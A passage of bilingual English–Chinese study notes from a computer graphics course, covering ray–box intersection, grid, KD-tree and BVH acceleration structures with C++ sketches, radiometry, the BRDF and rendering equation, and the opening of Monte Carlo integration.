      如果 $t_{\text{enter}} < t_{\text{exit}}$,我们知道射线会在盒子中停留一段时间(所以它们一定相交!)


    • However, ray is not a line

      但是,射线不是直线

      • Should check whether $t$ is negative for physical correctness!
      • 应检查 $t$ 是否为负数以确保物理正确性!
    • What if $t_\text{exit} < 0$?

      • The box is “behind” the ray — no intersection!

        盒子在射线“后面” ——没有相交!

    • What if $t_{\text{exit}} \ge 0$ and $t_{\text{enter}} < 0$?

      • The ray’s origin is inside the box — have intersection!

        射线的原点在盒子内部 — 有相交!

    • In summary, ray and AABB intersect iff

      综上所述,射线与 AABB 相交,当且仅当

      • $t_{\text{enter}} < t_{\text{exit}}$ && $t_{\text{exit}} \ge 0$
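
    ​把上面的判据写成代码,就是经典的 slab test(沿用前文示意的 `Vec3`;这里假设 `d` 的各分量非零,为零的轴在实际实现中需单独处理):

    ```cpp
    #include <algorithm>

    bool intersectAABB(const Vec3& o, const Vec3& d,
                       const Vec3& pMin, const Vec3& pMax) {
        double tEnter = -1e30, tExit = 1e30;
        const double po[3] = {o.x, o.y, o.z},  pd[3] = {d.x, d.y, d.z};
        const double lo[3] = {pMin.x, pMin.y, pMin.z};
        const double hi[3] = {pMax.x, pMax.y, pMax.z};
        for (int axis = 0; axis < 3; ++axis) {
            double t0 = (lo[axis] - po[axis]) / pd[axis];
            double t1 = (hi[axis] - po[axis]) / pd[axis];
            if (t0 > t1) std::swap(t0, t1);    // d 分量为负时交换
            tEnter = std::max(tEnter, t0);     // 进入所有平板对才算进入盒子
            tExit  = std::min(tExit,  t1);     // 离开任意一对平板即离开盒子
        }
        return tEnter < tExit && tExit >= 0.0; // 即上面总结的判据
    }
    ```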

    Why Axis-Aligned?

    General

    png

    $$t=\frac{(\mathbf{p}^{\prime}-\mathbf{o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}}$$

    3 subtractions, 6 multiplies, 1 division

    ​3 次减法,6 次乘法,1 次除法

    Slabs perpendicular to x-axis

    png

    $$t=\frac{\mathbf{p}^{\prime}_x-\mathbf{o}_x}{\mathbf{d}_x}$$

    1 subtraction, 1 division

    ​只需要 1 次减法,1 次除法

    Lecture 14: Ray Tracing 2 (Acceleration & Radiometry)

    Announcements

    ​公告

    • GTC news: DLSS 2.0

      图形学前沿

    • GTC news: RTXGI

    • Personal feeling

      个人感受

      • Offline rendering techniques will soon become real-time

        离线渲染技术将很快成为实时技术

      • Current real-time rendering techniques will still be useful

        当前的实时渲染技术仍然有用(光栅化还没有那么快被淘汰)

    Using AABBs to accelerate ray tracing

    Uniform Spatial Partitions (Grids)

    ​统一空间分割(网格)

    Preprocess – Build Acceleration Grid

    ​预处理 - 构建加速网格

    png

    1. Find bounding box

      给所有物体打一个包围盒

    png

    2. Create grid

      给这个包围盒用网格划分成多个小包围盒

    png

    3. Store each object in overlapping cells

      将每个对象存储在重叠的单元格中


    png

    Ray-Scene Intersection

    Step through grid in ray traversal order

    ​按射线遍历顺序逐步穿过网格

    For each grid cell

    ​对于每个网格单元

    ​Test intersection with all objects stored at that cell

    ​测试与存储在该单元格中的所有对象的交集。如果有交集,则检测到物体,再后续计算


    Grid Resolution?

    png

    One cell

    • No speedup

      网格大小的设定是个问题:如果只划分成一个格子,相当于没有加速

    png

    Too many cells

    • Inefficiency due to extraneous grid traversal

      无关的网格遍历导致效率低下

    png

    Heuristic:

    启发式:

    • #cells = C * #objs
    • C ≈ 27 in 3D

    网格个数大概为物体的个数的 27 倍比较合适!


    Uniform Grids – When They Work Well

    png

    Grids work well on large collections of objects that are distributed evenly in size and space

    ​网格适用于大小和空间分布均匀的大型对象集合


    Uniform Grids – When They Fail

    ​统一网格–当它们失效时

    png

    “Teapot in a stadium” problem

    ​当各个对象的大小和空间分布不均匀时,寄!这就是“体育馆里的茶壶”问题。

    Spatial Partitions

    Spatial Partitioning Examples

    ​空间划分实例

    png

    Note: you could have these in both 2D and 3D. In lecture we will illustrate principles in 2D.

    ​注意:您可以在二维和三维中使用这些内容。在课程中,我们将说明 2D 的原理。

    ​在计算机图形学中,空间划分是一种常用的技术,用于加速对空间中对象的搜索和查询。它通过将空间划分为更小的区域或单元来减少搜索的复杂度。以下是一些空间划分的示例:

    1. 网格 (Grid):网格将空间划分为规则的网格单元,每个单元可以包含一个或多个对象。这种方法适用于静态场景,可以通过网格索引快速定位对象。
    2. 八叉树 (Oct-Tree):八叉树是三维空间的类似于四叉树的划分方法。它将空间递归地分成八个立方体,每个立方体可以继续分为八个子立方体,以此类推。八叉树通常用于三维图形渲染、体素化等方面。
    3. kd-树 (kd-tree):kd-树是一种多维空间划分方法,它根据数据点在各维度上的分布,递归地将空间划分为轴对齐的超矩形区域。kd-树常用于最近邻搜索等问题。(与八叉树相比:八叉树每次同时沿 $x,y,z$ 三个方向划分,kd-树每次只沿一个方向划分,因此划分方式与维度无关)
    4. 二叉空间分区 (BSP-Tree):与 kd-树相比,它可以斜着切。(不过不是轴对齐的,不好计算)

    KD-Tree Pre-Processing

    png

    ​先给空间 $A$ 竖的来一刀。得到蓝绿两个区域(叶子节点)。

    png

    ​将绿色区域作为 $B$,横的来一刀。得到新的绿和黄色两个叶子节点。

    png

    ​以此类推,一阵乱切。

    Note: also subdivide nodes 1 and 2, etc.

    ​注:还可细分节点 1 和 2 等。只是示意图是这么切的而已。


    Data Structure for KD-Trees

    ​KD 树的数据结构

    Internal nodes store

    内部节点存储

    • split axis: x-, y-, or z-axis

      分割轴:X 轴、Y 轴或 Z 轴

    • split position: coordinate of split plane along axis

      分割位置:分割平面沿轴的坐标

    • children: pointers to child nodes

      子节点:指向子节点的指针

    • No objects are stored in internal nodes

      内部节点中不存储任何对象

    Leaf nodes store

    ​叶节点存储

    • list of objects

      对象列表


    Traversing a KD-Tree

    ​遍历 KD 树

    png

    ​射线穿过 $A$ 时,只需判断射线与各个叶子节点 $1,2,3,4,5$ 的相交关系即可。

    png

    Internal node: split

    ​内部节点:分割

    png

    Assume it’s a leaf node: intersect all objects

    ​假设它是叶节点:与该节点里的所有对象判断相交

    png

    Internal node: split

    ​内部节点:分割

    png

    Leaf node: intersect all objects

    ​遇到相交的叶节点,与所有叶节点里的所有对象判断相交

    png

    Intersection found

    ​找到相交的对象

    ​在计算机图形学领域,Object Partitions 和 Bounding Volume Hierarchy (BVH) 是两种常用的空间分割和组织技术,用于加速场景中对象的渲染和碰撞检测等操作。

    1. Object Partitions: Object Partitions 是一种将场景中的对象按照位置或其他属性进行划分的技术。通常情况下,这种划分是基于空间的,将场景划分为多个区域或单元,每个单元包含一组对象。Object Partitions 技术的目的是通过合理的空间划分,减少需要处理的对象数量,从而提高渲染和碰撞检测等操作的效率。常见的 Object Partitions 技术包括 kd-树、Octree 等。
    2. Bounding Volume Hierarchy (BVH): Bounding volume hierarchy (BVH) 即层次包围体,在 BVH 中,所有的几何物体都会被包在 bounding volume 的叶子节点里面,bounding volume 外面继续包着一个更大的 bounding volume,递归地包裹下去,最终形成的根节点会包裹着整个场景。

    KD-树目前用的比较少,主要是不好划分,而且一个对象有可能被放置在多个叶子节点里,导致重复计算。

    Object Partitions & Bounding Volume Hierarchy (BVH)

    Bounding Volume Hierarchy (BVH)

    png

    ​根节点包含整个场景。

    png

    ​在根节点里套包围盒。

    png

    ​我再套。

    png

    ​我还套!

    png


    Summary: Building BVHs

    • Find bounding box

      查找边界框

    • Recursively split set of objects in two subsets

      递归地将对象集合分成两个子集

    • Recompute the bounding box of the subsets

      重新计算子集的边界框

    • Stop when necessary

      必要时停止

    • Store objects in each leaf node

      在每个叶节点中存储对象


    Building BVHs

    How to subdivide a node?

    ​如何细分节点?

    • Choose a dimension to split

      选择要分割的维度

    • Heuristic #1: Always choose the longest axis in node

      启发式 1: 始终选择节点中最长的轴线

    • Heuristic #2: Split node at location of median object

      启发式 2: 在中位对象的位置分割节点

    Termination criteria?

    ​终止标准?

    • Heuristic: stop when node contains few elements (e.g. 5)

      启发式:当节点包含较少元素(如 5 个)时停止


    Data Structure for BVHs

    Internal nodes store

    ​内部节点存储

    • Bounding box

      边界框

    • Children: pointers to child nodes

      子节点:指向子节点的指针

    Leaf nodes store

    ​叶节点存储

    • Bounding box

      边界框

    • List of objects

      对象列表

    Nodes represent subset of primitives in scene

    ​节点代表场景中基元的子集

    • All objects in subtree

      子树上的所有对象


    BVH Traversal

    png

    ```
    Intersect(Ray ray, BVH node) {
        if (ray misses node.bbox) return;
        if (node is a leaf node) {
            test intersection with all objs;
            return closest intersection;
        }
        hit1 = Intersect(ray, node.child1);
        hit2 = Intersect(ray, node.child2);
        return the closer of hit1, hit2;
    }
    ```

    ​递归地检测是否相交。
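
    ​下面给出与上面伪代码对应的一个 C++ 草图;`BVHNode` 的布局按前文“BVH 的数据结构”一节假设,`intersectObject` 是调用方传入的逐对象求交回调,仅为示意:

    ```cpp
    #include <algorithm>
    #include <functional>
    #include <optional>
    #include <vector>

    struct BVHNode {
        Vec3 bboxMin, bboxMax;        // 包围盒
        BVHNode* child1 = nullptr;    // 内部节点:两个子节点
        BVHNode* child2 = nullptr;
        std::vector<int> objects;     // 叶节点:对象列表(内部节点为空)
    };

    // intersectAABB 即上面的 slab test;intersectObject 返回命中距离 t
    // (未命中返回 nullopt)。
    std::optional<double> intersectBVH(
        const BVHNode* node, const Vec3& o, const Vec3& d,
        const std::function<std::optional<double>(int)>& intersectObject) {
        if (!node || !intersectAABB(o, d, node->bboxMin, node->bboxMax))
            return std::nullopt;                   // 射线未命中 node.bbox
        if (!node->objects.empty()) {              // 叶节点:测试所有对象
            std::optional<double> best;
            for (int obj : node->objects)
                if (auto t = intersectObject(obj))
                    if (!best || *t < *best) best = t;
            return best;
        }
        auto h1 = intersectBVH(node->child1, o, d, intersectObject);
        auto h2 = intersectBVH(node->child2, o, d, intersectObject);
        if (!h1) return h2;
        if (!h2) return h1;
        return std::min(*h1, *h2);                 // 取 hit1、hit2 中较近者
    }
    ```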


    Spatial vs Object Partitions

    png

    Spatial partition (e.g.KD-tree)

    ​空间分区(如 KD 树)

    • Partition space into non-overlapping regions

      将空间划分为不重叠的区域

    • An object can be contained in multiple regions

      一个对象可包含在多个区域中

    png

    Object partition (e.g. BVH)

    ​对象分区(如 BVH)

    • Partition set of objects into disjoint subsets

      将对象集合划分为互不相交的子集

    • Bounding boxes for each set may overlap in space

      每个子集的边界框可能在空间上重叠

    Basic radiometry (辐射度量学)

    Advertisement: new topics from now on, scarcely covered in other graphics courses

    ​广告:从现在开始,其他图形课程很少涉及的新主题


    Radiometry — Motivation

    png

    Observation

    • In assignment 3, we implement the Blinn-Phong model

      在作业 3 中,我们执行 Blinn-Phong 模型

    • Light intensity $I$ is 10, for example

      例如,光强 $I$ 为 10

    • But 10 what?

      但 10 是什么?连单位都没有

    Do you think Whitted style ray tracing gives you CORRECT results?

    ​你认为怀特风格的光线追踪能得出正确的结果吗?

    All the answers can be found in radiometry

    ​所有答案都可以在辐射测量中找到

    • Also the basics of “Path Tracing”

      还有”路径跟踪“的基础知识


    Radiometry

    ​辐射测量

    Measurement system and units for illumination

    ​照明测量系统和单位

    Accurately measure the spatial properties of light

    ​精确测量光的空间特性

    • New terms: Radiant flux, intensity, irradiance, radiance

      新术语:辐射通量、强度、辐照度、辐射度

    Perform lighting calculations in a physically correct manner

    ​以物理上正确的方式进行照明计算


    My personal way of learning things:

    ​我个人的学习方法:

    • WHY, WHAT, then HOW

      为什么、是什么,然后是怎么做

    Radiant Energy and Flux (Power)

    ​辐射能量和通量(功率)

    Definition: Radiant energy is the energy of electromagnetic radiation. It is measured in units of joules, and denoted by the symbol:

    ​定义:辐射能是电磁辐射的能量。它以焦耳为单位,用符号表示:

    $$Q\mathrm{[J=Joule]}$$

    Definition: Radiant flux (power) is the energy emitted, reflected, transmitted or received, per unit time

    ​定义:辐射通量(功率)是单位时间内发射、反射、传输或接收的能量

    $$\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}\text{ [W = Watt] [lm = lumen]}^\star $$


    Flux – #photons flowing through a sensor in unit time

    ​光通量–单位时间内流经传感器的光子数量

    png


    Important Light Measurements of Interest

    ​重要的相关光测量值

    png

    Light Emitted From A Source
    光源发出的光
    “Radiant Intensity”
    辐射强度

    png

    Light Falling On A Surface
    光落在物体表面
    “Irradiance”
    "辐照度"

    png

    Light Traveling Along A Ray
    光沿着光线行进
    "Radiance"
    “光芒”

    Radiant Intensity

    ​辐射强度

    Definition: The radiant (luminous) intensity is the power per unit solid angle (?) emitted by a point light source.

    ​定义:辐射(发光)强度是点光源在单位立体角(?这是个什么玩意)上发出的功率。

    png

    $I(\omega)\equiv\frac{\mathrm{d}\Phi}{\mathrm{d}\omega}$

    $\left[\frac{\mathrm{W}}{\mathrm{sr}}\right]\left[\frac{\mathrm{lm}}{\mathrm{sr}}=\mathrm{cd}=\mathrm{candela}\right]$

    The candela is one of the seven SI base units.

    ​坎德拉是国际单位制七个基本单位之一。


    Angles and Solid Angles

    png

    Angle: ratio of subtended arc length on circle to radius

    ​平面角:圆上所对弧长与半径之比

    • $\theta=\frac{l}{r}$

    • Circle has $2\pi$ radians

      圆的弧度为 $2\pi$

    png

    Solid angle: ratio of subtended area on sphere to radius squared

    ​立体角:球面上所对面积与半径平方之比

    • $\Omega=\frac{A}{r^2}$

    • Sphere has $4\pi$ steradians


    Differential Solid Angles

    png

    ​这个立体角的求解公式:

    $$\begin{aligned}\mathrm{d}A&=(r\,\mathrm{d}\theta)(r\sin\theta\,\mathrm{d}\phi)\\&=r^2\sin\theta\,\mathrm{d}\theta\,\mathrm{d}\phi\end{aligned}$$

    $$\mathrm{d}\omega=\frac{\mathrm{d}A}{r^2}=\sin\theta\mathrm{d}\theta\mathrm{d}\phi $$

    **Sphere:** $S^2$

    $$\begin{aligned}\Omega&=\int_{S^2}\mathrm{d}\omega\\&=\int_0^{2\pi}\int_0^\pi\sin\theta\,\mathrm{d}\theta\,\mathrm{d}\phi\\&=4\pi\end{aligned}$$


    $\omega$ as a direction vector

    ​将 $\omega$ 作为方向向量

    png

    Will use $\omega$ to denote a direction vector (unit length)

    ​用 $\omega$ 表示方向向量(单位长度)


    Isotropic Point Source

    ​各向同性点源

    png

    $$\begin{aligned}\Phi&=\int_{S^2}I\,\mathrm{d}\omega\\&=4\pi I\end{aligned}$$

    $$I=\frac\Phi{4\pi}$$


    Modern LED Light

    png

    Output: 815 lumens

    ​输出:815 流明

    (11W LED replacement for 60W incandescent)

    ​(11 瓦 LED 可替代 60 瓦白炽灯)

    Radiant intensity?

    ​辐射强度?

    Assume isotropic:

    ​Intensity = 815 lumens / 4π sr ≈ 65 candelas

    Lecture 15 Ray Tracing 3 (Light Transport & Global Illumination)

    Reviewing Concepts

    png

    | 名称 | 公式 | 解释 |
    | --- | --- | --- |
    | Radiant energy 辐射能(在 CG 中很少使用) | $Q\ [\mathrm{J}=\text{Joule}]$ | the energy of electromagnetic radiation 电磁辐射的能量 |
    | Radiant flux (power) 辐射通量(功率) | $\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}\ [\mathrm{W}=\text{Watt}]\ [\mathrm{lm}=\text{lumen}]$ | energy per unit time 单位时间能量 |
    | Radiant intensity 辐射强度 | $I(\omega)\equiv\frac{\mathrm{d}\Phi}{\mathrm{d}\omega}$ | power per unit solid angle 单位立体角功率 |
    | Solid angle 立体角 | $\Omega=\frac{A}{r^2}$ | ratio of subtended area on sphere to radius squared 球面所对面积与半径平方之比 |

    Irradiance

    辐照度

    Definition: The irradiance is the power per unit area incident on a surface point.

    ​定义:辐照度是照射在表面某一点的每单位面积的功率。

    png

    $$E(\mathrm x)\equiv\frac{\text d\Phi(\mathrm x)}{\mathrm d A}$$

    $$\left[\frac{\mathrm{W}}{\mathrm{m}^2}\right]\left[\frac{\text{lm}}{\mathrm{m}^2}=\text{lux}\right]$$


    Lambert’ s Cosine Law

    ​兰伯特余弦定理

    Irradiance at surface is proportional to cosine of angle between light direction and surface normal.

    ​表面辐照度与光线方向和表面法线之间的角度的余弦成正比。

    (Note: always use a unit area, the cosine applies on $\Phi$)

    ​(注意:始终使用单位面积,余弦适用于 $\Phi$)

    png

    Top face of cube receives a certain amount of power
    立方体顶面接收一定量的能量
    $E=\frac{\Phi}{A}$

    png

    Top face of 60º rotated cube receives half power
    60º 旋转立方体的顶面接收一半功率
    $E=\frac{1}{2}\frac{\Phi}{A}$

    png

    In general, power per unit area is proportional to $\cos\theta=l\cdot n$
    一般而言,单位面积功率与 $\cos\theta=l\cdot n$ 相关
    $E=\frac{\Phi}{A}\cos\theta$

    Why Do We Have Seasons?

    png

    ​为什么我们会有季节?因为太阳光到地球各个地方的夹角不同。

    Earth’s axis of rotation: ~23.5° off axis


    Correction: Irradiance Falloff

    ​校正:辐照度衰减

    png

    Assume light is emitting power in a uniform angular distribution

    ​假设光以均匀的角度分布发射功率

    Compare irradiance at surface of two spheres:

    ​比较两个球体表面的辐照度:

    Radiance

    ​辐射

    png

    Radiance is the fundamental field quantity that describes the distribution of light in an environment

    ​辐射度是描述环境中光分布的基本场量

    • Radiance is the quantity associated with a ray

      辐射度是与射线相关的量

    • Rendering is all about computing radiance

      渲染就是计算辐射度

    Definition: The radiance (luminance) is the power emitted, reflected, transmitted or received by a surface, per unit solid angle, per projected unit area.

    ​定义:辐射度(亮度)是表面在单位立体角单位投影面积上发射、反射、透射或接收的功率。

    png

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    $\cos\theta$ accounts for projected surface area

    ​$\cos\theta$ 表示投影表面积

    $$\left[\frac{\mathrm{W}}{\mathrm{sr}\,\mathrm{m}^{2}}\right]\left[\frac{\mathrm{cd}}{\mathrm{m}^{2}}=\frac{\mathrm{lm}}{\mathrm{sr}\,\mathrm{m}^{2}}=\mathrm{nit}\right]$$

    Definition: power per unit solid angle per projected unit area.

    ​定义:单位投影面积单位立体角的功率。

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    Recall

    • Irradiance: power per projected unit area

      辐照度:单位投影面积的功率

    • Intensity: power per solid angle

      强度:单位立体角的功率

    So

    • Radiance: Irradiance per solid angle

      辐射度:单位立体角的辐照度

    • Radiance: Intensity per projected unit area

      辐射度:单位投影面积的强度


    Incident Radiance

    ​入射辐射

    Incident radiance is the irradiance per unit solid angle arriving at the surface.

    ​入射辐射度 (radiance) 是到达表面的、单位立体角上的辐照度 (irradiance)。

    png

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}E(\mathrm{p})}{\mathrm{d}\omega\cos\theta}$$

    i.e. it is the light arriving at the surface along a given ray (point on surface and incident direction).

    ​即,它是沿给定射线(表面上的点和入射方向)到达表面的光。


    Exiting Radiance

    png

    Exiting surface radiance is the intensity per unit projected
    area leaving the surface.

    ​出射表面辐射度是离开表面的每单位投影面积的强度。

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}I(\mathrm{p},\omega)}{\mathrm{d}A\cos\theta}$$

    e.g. for an area light it is the light emitted along a given ray
    (point on surface and exit direction).

    ​例如,对于区域光来说,它是沿给定射线(表面上的点和出射方向)发射的光。


    Irradiance vs. Radiance

    ​辐照度与辐射度

    Irradiance: total power received by area $\text dA$

    ​辐照度:区域 $\text dA$ 接收的总功率

    Radiance: power received by area $\text dA$ from “direction” $\text d\omega$

    ​辐射度:区域 $\text dA$ 从“方向” $\text d\omega$ 接收的功率

    $$\begin{aligned}\mathrm{d}E(\mathrm{p},\omega)&=L_i(\mathrm{p},\omega)\cos\theta\,\mathrm{d}\omega\\E(\mathrm{p})&=\int_{H^2}L_i(\mathrm{p},\omega)\cos\theta\,\mathrm{d}\omega\end{aligned}$$

    png

    Unit Hemisphere 单位半球: $H^2$
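
    ​可以用数值积分快速验证这个式子。下面的最小 C++ 草图假设 $L_i$ 为常数 $L$(示意),利用前面“Differential Solid Angles”一节的结论 $\mathrm{d}\omega=\sin\theta\,\mathrm{d}\theta\,\mathrm{d}\phi$,理论值应为 $\pi L$:

    ```cpp
    #include <cmath>
    #include <cstdio>

    const double PI = 3.14159265358979323846;

    // 数值计算 E(p) = ∫_{H^2} L cosθ dω = ∫∫ L cosθ sinθ dθ dφ。
    int main() {
        const double L = 1.0;
        const int nTheta = 4096;
        const double dTheta = (PI / 2) / nTheta;
        double E = 0.0;
        for (int i = 0; i < nTheta; ++i) {
            double theta = (i + 0.5) * dTheta;          // θ ∈ [0, π/2)
            // 被积函数与 φ 无关,φ 方向的积分贡献因子 2π
            E += L * std::cos(theta) * std::sin(theta) * dTheta * (2 * PI);
        }
        std::printf("E = %f (expect pi*L = %f)\n", E, PI * L);
        return 0;
    }
    ```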

    Bidirectional Reflectance Distribution Function (BRDF)

    ​双向反射分布函数 (BRDF)


    Reflection at a Point

    ​点的反射

    Radiance from direction $\omega_i$ turns into the power $E$ that $\text dA$ receives
    Then power $E$ will become the radiance to any other direction $\omega_o$

    ​来自方向 $\omega_i$ 的辐射度变为 $\text dA$ 接收的功率 $E$ 然后功率 $E$ 将成为到任何其他方向 $\omega_o$ 的辐射度

    png

    Differential irradiance incoming 入射的微分辐照度:$\text dE(\omega_i)=L(\omega_i)\cos\theta_i\,\text d\omega_i$

    Differential radiance exiting (due to $\text d E(\omega_i)$) 出射的微分辐射度(由 $\text d E(\omega_i)$ 引起):$\text d L_r(\omega_r)$


    BRDF

    The Bidirectional Reflectance Distribution Function (BRDF) represents how much light is reflected into each outgoing direction $\omega_r$ from each incoming direction

    ​双向反射分布函数 (BRDF) 表示从每个入射方向反射到每个出射方向 $\omega_r$ 的光量

    png

    $$f_r(\omega_i\to\omega_r)=\frac{\mathrm{d}L_r(\omega_r)}{\mathrm{d}E_i(\omega_i)}=\frac{\mathrm{d}L_r(\omega_r)}{L_i(\omega_i)\cos\theta_i\mathrm{d}\omega_i}\left[\frac{1}{\mathrm{sr}}\right]$$


    The Reflection Equation

    ​反射方程

    png

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$


    Challenge: Recursive Equation

    ​挑战:递归方程

    Reflected radiance depends on incoming radiance

    ​反射辐射取决于入射辐射

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    • $L_r(\mathrm{p},\omega_r)$ reflected radiance 反射辐射
    • $L_{i}(\mathrm{p},\omega_{i})$ incoming radiance 入射辐射

    But incoming radiance depends on reflected radiance (at
    another point in the scene)

    ​但入射辐射取决于反射辐射(在场景中的另一点)


    The Rendering Equation

    ​渲染方程

    Re-write the reflection equation 重写反射方程:

    $$\begin{aligned}L_r(\text{p},\omega_r)=\int_{H^2}f_r(\text{p},\omega_i\to\omega_r)L_i(\text{p},\omega_i)\cos\theta_i\text{d}\omega_i\end{aligned}$$

    by adding an Emission term to make it general!

    ​通过添加发射项使其变得通用!

    The Rendering Equation

    $$\begin{aligned}L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i\end{aligned}$$

    How to solve? Next lecture!

    Note: now, we assume that all directions are pointing outwards!

    注意:现在,我们假设所有方向都指向外面($\Omega^+$)!

    Understanding the rendering equation

    ​理解渲染方程

    png

    ​对于单个点光源:

    $L_r(x,\omega_r)=L_e(x,\omega_r)+L_i(x,\omega_i)f(x,\omega_i,\omega_r)(\omega_i,n)$

    • $L_r(x,\omega_r)$

      Reflected Light (Output Image) 反射光(输出图像)

    • $L_e(x,\omega_r)$

      Emission

      自发光

    • $L_i(x,\omega_i)$

      Incident Light (from light source)

      入射光(来自光源)

    • $f(x,\omega_i,\omega_r)$

      BRDF

    • $(\omega_i,n)$

      Cosine of Incident angle

      入射角余弦

    png

    ​多个点光源,求和。Sum over all light sources.

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\sum L_i(x,\omega_i)\left.f(x,\omega_i,\omega_r)\right.(\omega_i,n)$$

    png

    ​平面光源,使用积分。Replace sum with integral.

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_i(x,\omega_i)f(x,\omega_i,\omega_r)\cos\theta_i\mathrm{d}\omega_i$$

    png

    Surfaces (interreflection)

    ​表面(相互反射)

    png

    png

    ​这是当年那个论文渲染出来的结果。


    Rendering Equation as Integral Equation

    ​将方程渲染为积分方程

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_r(x^{\prime},-\omega_i)f(x,\omega_i,\omega_r)\cos\theta_id\omega_i$$

    ​要是能看到一个物体,要么它自身能发光,要么它能反射出其它光源发出的光。

    Is a Fredholm Integral Equation of second kind [extensively studied numerically] with canonical form

    ​是具有规范形式的第二类 Fredholm 积分方程 [经过广泛的数值研究]

    $$l(u)=e(u)+\int l(v)K(u,v)dv$$

    ​$K(u,v)$ 是方程的核 (Kernel),即光传输算子 (Light Transport Operator)。

    $$L=E+KL$$

    Can be discretized to a simple matrix equation [or system of simultaneous linear equations] ($L$, $E$ are vectors, $K$ is the light transport matrix)

    ​可以离散化为一个简单的矩阵方程[或联立线性方程组]($L$、$E$为向量,$K$为光传输矩阵)


    Ray Tracing and extensions

    ​光线追踪和扩展

    • General class numerical Monte Carlo methods

      通用类数值蒙特卡罗方法

    • Approximate set of all paths of light in scene

      场景中所有光路的近似集

    $$\begin{aligned}L&=E+KL\\IL-KL&=E\\(I-K)L&=E\\L&=(I-K)^{-1}E\end{aligned}$$

    ​在矩阵运算中,$(I-K)^{-1}$ 有类似泰勒公式一样的性质:Binomial Theorem 二项式定理

    $$\begin{aligned}
    L&=(1+K+K^2+K^3+\dots)E \\
    L&=E+KE+K^2E+K^3E+\dots
    \end{aligned}$$

    • $E$

      Emission directly From light sources

      直接从光源发射

    • $KE$

      Direct Illumination on surfaces

      表面直接照明

    • $K^2E$

      Indirect Illumination (One bounce indirect) [Mirrors, Refraction]

      间接照明(一次间接反射)[镜子、折射]

    • $K^3E$

      (Two bounce indirect illum.)

      (两次反射间接照明。)

    如果只取 $L=E+KE$,则我们可以视为 Shading in Rasterization 光栅化中的着色
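
    ​可以用一个 2×2 的小例子数值验证 $L=(I-K)^{-1}E$ 等于级数 $E+KE+K^2E+\dots$。下面的 C++ 草图中,$K$ 是随意取的“光传输矩阵”(假设谱半径小于 1,级数收敛):

    ```cpp
    #include <cstdio>

    int main() {
        double K[2][2] = {{0.3, 0.1}, {0.2, 0.4}};
        double E[2]    = {1.0, 0.5};        // 自发光向量 E
        double L[2]    = {0.0, 0.0};        // 级数部分和
        double term[2] = {E[0], E[1]};      // 当前项 K^n E,从 E 开始
        for (int bounce = 0; bounce < 50; ++bounce) {
            L[0] += term[0]; L[1] += term[1];   // 累加 K^n E
            double n0 = K[0][0]*term[0] + K[0][1]*term[1];
            double n1 = K[1][0]*term[0] + K[1][1]*term[1];
            term[0] = n0; term[1] = n1;         // 再乘一次 K
        }
        // 只累加前两项 E + KE,就是上面说的“光栅化中的着色”近似。
        std::printf("L = (%f, %f)\n", L[0], L[1]);
        return 0;
    }
    ```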

    png

    ​Direct illumination 不计算反射,背光面将会一片漆黑。

    ​计算的反射越多,画面越真实,也会越亮,但不会无限变亮。


    Probability Review

    Random Variables

    ​随机变量

    $X$ random variable. Represents a distribution of potential values

    ​随机变量。表示潜在值的分布

    $X\sim p(x)$ probability density function (PDF). Describes relative probability of a random process choosing value

    ​概率密度函数(PDF)。描述随机过程选择值的相对概率

    Example: uniform PDF: all values over a domain are equally likely

    ​示例:均匀密度函数:域内的所有值都具有相同的可能性

    png

    ​示例:扔骰子

    $X$ takes on values $1, 2, 3, 4, 5, 6$

    $p(1)=p(2)=p(3)=p(4)=p(5)=p(6)$


    Probabilities

    ​概率

    png

    $n$ discrete values $x_i$ with probability $p_i$

    ​$n$ 个离散值 $x_i$ 具有概率 $p_i$

    Requirements of a probability distribution:

    ​概率分布的要求:

    $p_i\ge 0$

    $\sum^n_{i=1}p_i=1$

    Six-sided die example 六面骰子示例:$p_i=\frac{1}{6}$


    Expected Value of a Random Variable

    ​随机变量的期望值

    The average value that one obtains if repeatedly drawing samples from the random distribution.

    ​从随机分布中反复抽取样本所获得的平均值。

    Expected value of $X$:$E[X]=\sum_{i=1}^{n}x_{i}p_{i}$

    Die example: $\begin{aligned}E[X]&=\sum_{i=1}^{6}\frac{i}{6}\\&=(1+2+3+4+5+6)/6=3.5\end{aligned}$


    Continuous Case: Probability Distribution Function (PDF)

    ​连续情况:概率分布函数 (PDF)

    png

    $$X\sim p(x)$$

    A random variable $X$ that can take any of a continuous set of values, where the relative probability of a particular value is given by a continuous probability density function $p(x)$.

    ​随机变量 $X$ 可以取一组连续的值中的任意一个,其中特定值的相对概率由连续概率密度函数 $p(x)$ 给出。

    Conditions on $p(x)$: $p(x)\geq0$ and $\int p(x)\,\text dx=1$

    Expected value of $X$: $E[X]=\int xp(x)dx$

    Lecture 16 Ray Tracing 4 (Monte Carlo Path Tracing)

    Monte Carlo Integration

    Why: we want to solve an integral, but it can be too difficult to solve analytically.

    ​原因:我们想解一个积分,但用分析方法(牛顿莱布尼茨公式)解太难了。

    What & How: estimate the integral of a function by averaging random samples of the function’ s value.

    ​内容和方法:通过对函数值的随机样本求平均值来估计函数的积分。

    png

    Let us define the Monte Carlo estimator for the definite integral of given function $f(x)$

    ​让我们为给定函数 $f(x)$ 的定积分定义蒙特卡洛估计量

    Definite integral 定积分:$\int_a^bf(x)dx$

